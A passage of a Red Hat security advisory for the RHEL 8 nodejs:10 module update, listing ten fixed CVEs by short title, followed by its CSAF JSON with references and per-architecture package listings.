An update for the nodejs:10 module is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: nodejs (10.23.1).
Security Fix(es):
* libuv: buffer overflow in realpath (CVE-2020-8252)
* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)
* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)
* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs-dot-prop: prototype pollution (CVE-2020-8116)
* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)
* npm: sensitive information exposure through logs (CVE-2020-15095)
* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)
* nodejs-yargs-parser: prototype pollution vulnerability (CVE-2020-7608)
* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for the nodejs:10 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (10.23.1).\n\nSecurity Fix(es):\n\n* libuv: buffer overflow in realpath (CVE-2020-8252)\n\n* nodejs-npm-user-validate: improper input validation when validating user emails leads to ReDoS (CVE-2020-7754)\n\n* nodejs-y18n: prototype pollution vulnerability (CVE-2020-7774)\n\n* nodejs-ini: prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs-dot-prop: prototype pollution (CVE-2020-8116)\n\n* nodejs: use-after-free in the TLS implementation (CVE-2020-8265)\n\n* npm: sensitive information exposure through logs (CVE-2020-15095)\n\n* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function (CVE-2020-15366)\n\n* nodejs-yargs-parser: prototype pollution vulnerability (CVE-2020-7608)\n\n* nodejs: HTTP request smuggling via two copies of a header field in an http request (CVE-2020-8287)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:0548", "url": "https://access.redhat.com/errata/RHSA-2021:0548" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1840004", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1840004" }, { "category": "external", "summary": "1856875", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1856875" }, { "category": "external", "summary": "1857977", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1857977" }, { "category": "external", "summary": "1868196", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1868196" }, { "category": "external", "summary": "1879315", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1879315" }, { "category": "external", "summary": "1892430", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1892430" }, { "category": "external", "summary": "1898680", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898680" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1912854", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912854" }, { "category": "external", "summary": "1912863", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1912863" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_0548.json" } ], "title": "Red Hat Security Advisory: nodejs:10 security update", "tracking": { "current_release_date": "2024-11-15T09:39:41+00:00", "generator": { "date": "2024-11-15T09:39:41+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.1" } }, "id": "RHSA-2021:0548", "initial_release_date": "2021-02-16T14:25:46+00:00", "revision_history": [ { "date": "2021-02-16T14:25:46+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-02-16T14:25:46+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-15T09:39:41+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux AppStream (v. 8)", "product": { "name": "Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN", "product_identification_helper": { "cpe": "cpe:/a:redhat:enterprise_linux:8::appstream" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "nodejs:10:8030020210118191659:229f0a1c", "product": { "name": "nodejs:10:8030020210118191659:229f0a1c", "product_id": "nodejs:10:8030020210118191659:229f0a1c", "product_identification_helper": { "purl": "pkg:rpmmod/redhat/nodejs@10:8030020210118191659:229f0a1c" } } }, { "category": "product_version", "name": "nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "product": { "name": "nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "product_id": "nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-docs@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=noarch\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "product": { "name": "nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "product_id": "nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@1.18.3-1.module%2Bel8%2B2632%2B6c5111ed?arch=noarch" } } }, { "category": "product_version", "name": "nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "product": { "name": "nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "product_id": "nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@17-3.module%2Bel8%2B2873%2Baa7dfd9a?arch=noarch" } } } ], "category": "architecture", "name": "noarch" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product": { "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product_id": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product": { "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product_id": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product": { "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product_id": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product": { "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product_id": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product": { "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product_id": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "product": { "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "product_id": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.10.23.1.1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=aarch64\u0026epoch=1" } } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "product": { "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "product_id": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=src\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "product": { "name": "nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "product_id": "nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@1.18.3-1.module%2Bel8%2B2632%2B6c5111ed?arch=src" } } }, { "category": "product_version", "name": "nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "product": { "name": "nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "product_id": "nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@17-3.module%2Bel8%2B2873%2Baa7dfd9a?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product": { "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product_id": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product": { "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product_id": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product": { "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product_id": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product": { "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product_id": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product": { "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product_id": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "product": { "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "product_id": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.10.23.1.1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=ppc64le\u0026epoch=1" } } } ], "category": "architecture", "name": "ppc64le" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product": { "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product_id": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product": { "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product_id": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product": { "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product_id": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product": { "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product_id": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product": { "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product_id": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "product": { "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "product_id": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.10.23.1.1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=s390x\u0026epoch=1" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product": { "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product_id": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product": { "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product_id": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product": { "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product_id": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product": { "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product_id": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product": { "name": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product_id": "nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@10.23.1-1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64", "product": { "name": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64", "product_id": "npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@6.14.10-1.10.23.1.1.module%2Bel8.3.0%2B9502%2B012d8a97?arch=x86_64\u0026epoch=1" } } } ], "category": "architecture", "name": "x86_64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, "product_reference": "nodejs:10:8030020210118191659:229f0a1c", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64" }, "product_reference": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le" }, "product_reference": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x" }, "product_reference": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src" }, "product_reference": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64" }, "product_reference": "nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64" }, "product_reference": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le" }, "product_reference": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x" }, "product_reference": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64" }, "product_reference": "nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64" }, "product_reference": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le" }, "product_reference": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x" }, "product_reference": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64" }, "product_reference": "nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64 as a component of nodejs:10:8030020210118191659:229f0a1c as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64" }, "product_reference": "nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "relates_to_product_reference": "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c" }, { 